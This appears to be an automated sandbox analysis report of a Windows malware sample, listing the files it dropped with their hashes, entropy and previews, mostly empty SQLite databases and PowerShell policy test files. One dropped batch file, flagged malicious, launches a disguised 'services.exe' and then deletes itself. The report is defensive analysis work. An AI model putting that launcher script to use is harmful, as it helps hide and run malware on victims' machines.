                                                                                                    SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                    MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                    SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                    SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                    SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:NlllulJnp/p:NllU
                                                                                                    MD5:BC6DB77EB243BF62DC31267706650173
                                                                                                    SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                                    SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                                    SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                                    Malicious:false
                                                                                                    Preview:@...e.................................X..............@..........

                                                                                                    C:\Users\user\AppData\Local\Temp\01KSb0KVRo

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98304
                                                                                                    Entropy (8bit):0.08235737944063153
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                    MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                    SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                    SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                    SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\0zDW1acYVi

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40960
                                                                                                    Entropy (8bit):0.8553638852307782
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\5E3ILXvvHo

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):0.5712781801655107
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\7NDq3lu0zc

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):0.5707520969659783
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\8OHb3JSfdO

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25
                                                                                                    Entropy (8bit):4.323856189774724
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:nCFz6nmVLTJ:oWinJ
                                                                                                    MD5:D6AEBFF62CA3CEB8429C5158150E01BC
                                                                                                    SHA1:FED63341BA856653AB4D8C3B4120E9BD2EC398C8
                                                                                                    SHA-256:FA22A65CB569293C9E1DED374F98B3706D7531A198C9648459EE5B366C58BF85
                                                                                                    SHA-512:C1943F9325FCEB3108D421ECA0012DF38DCF02182B7D0B98B197546043C8B48268C8AE5B1E0B299264DE26E5A3DF97AACBD693CA35B4CE569CA263C1DC679BC2
                                                                                                    Malicious:false
                                                                                                    Preview:akgAl2sV0LCBBDv9hhpnvU80Q

                                                                                                    C:\Users\user\AppData\Local\Temp\9Xg83uH7H5

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20480
                                                                                                    Entropy (8bit):0.5707520969659783
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\AQHpz75BKC

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28672
                                                                                                    Entropy (8bit):2.5793180405395284
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\B7heSupDrt.bat

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):187
                                                                                                    Entropy (8bit):5.1778388835327185
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mbZj4I5SMLBLM2HOBEIpGNHovBktKcKZG1t+kiE2JM:hCRLuVFOOr+DER5SMLDVVVovKOZG1wkF
                                                                                                    MD5:DAB2C7082BFA3CB2A3C9206B182172EA
                                                                                                    SHA1:CAEAE1867C7B5B736A3B9BDCB8AEC92206029C1B
                                                                                                    SHA-256:E5998A2D833F6C4641DB98C682232BF874DC39EF2B9D0E0CA31278941EC80F1B
                                                                                                    SHA-512:93CA34118E12AAF69E73A67BD07A02B047D5C953DDD9C72A71B23740A2DB021B3CA72FFCB9783B26A4C73E7D2B74F8771DA4AE108B3AE774C0A56EC5503D7774
                                                                                                    Malicious:true
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\windows sidebar\Gadgets\services.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\B7heSupDrt.bat"

                                                                                                    C:\Users\user\AppData\Local\Temp\RES2DC7.tmp

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6ec, 10 symbols, created Sat Jan 4 15:04:46 2025, 1st section name ".debug$S"
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1956
                                                                                                    Entropy (8bit):4.549437628852929
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:H/lZ9O9/OxztDfHxwKEsmNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+QlUZ:jvNx6KhmMluOulajfqXSfbNtmh1Z
                                                                                                    MD5:EEE55D831BFBB02C82CA697CF9461CCA
                                                                                                    SHA1:47C7A50B64117F3DC7B74CF49161B2EFEF4645BE
                                                                                                    SHA-256:1B91FCAFB6FD980F72F15C3744111FA5ADFF13F4CDA584310F4DB0C28F755EC7
                                                                                                    SHA-512:8A498552DCF3AE0F2030F7CE1C16A977DECD699A024CD1035F1A98594CD159BB3E84A1F94DD09C94397FEFC974E53A104F9F878584977F12B7587244C8BFA20B
                                                                                                    Malicious:false
                                                                                                    Preview:L....Nyg.............debug$S........<...................@..B.rsrc$01................h...........@..@.rsrc$02........p...|...............@..@........=....c:\Windows\System32\CSC63445EDF6B1F4E2FAF4EDB3743FA6EFB.TMP.....................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RES2DC7.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.

                                                                                                    C:\Users\user\AppData\Local\Temp\TNF130SpgM

                                                                                                    Download File
                                                                                                    Process:C:\Users\user\Desktop\6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25
                                                                                                    Entropy (8bit):4.4838561897747224
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:ok8wtdTn:58wth
                                                                                                    MD5:0514D218A08001DCFA11154F31C63C1E
                                                                                                    SHA1:17206916FE61C56331B10694C7690FC2DF45B39F
                                                                                                    SHA-256:41092D9CA47F48ECE6DD0B4628648C193A2A832B396EDD4E30B4E79F3B9C668C
                                                                                                    SHA-512:FEA2EBD111AC65651CEEF20BA1A58E4F552ECAE6A399AAB6374BAA610679D3063E1C884F884C3E1DC1F0AD103EEE9C0084AA8B064DE9F8C50A4D6ADCD8D553BC
                                                                                                    Malicious:false
                                                                                                    Preview:yGAA63Rzpw3nIbBFDg5mhcQSf

                                                                                                    C:\Users\user\AppData\Local\Temp\Xw9tMZG9ZU

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\WindowsPowerShell\Configuration\Registration\System.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):49152
                                                                                                    Entropy (8bit):0.8180424350137764
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                    MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                    SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                    SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                    SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5jpspxvs.cq4.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5yfumbqc.p1g.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4uazkqv.htn.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h2ojmsvj.fbm.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hn0ftdrm.qay.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ioul1sws.5c4.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_js2xlw1y.hu5.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kkf05d2c.bl0.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lnhwdbmq.lla.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m05nrrcp.bpx.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzzhtk1x.dxb.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pojuqbd4.yek.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
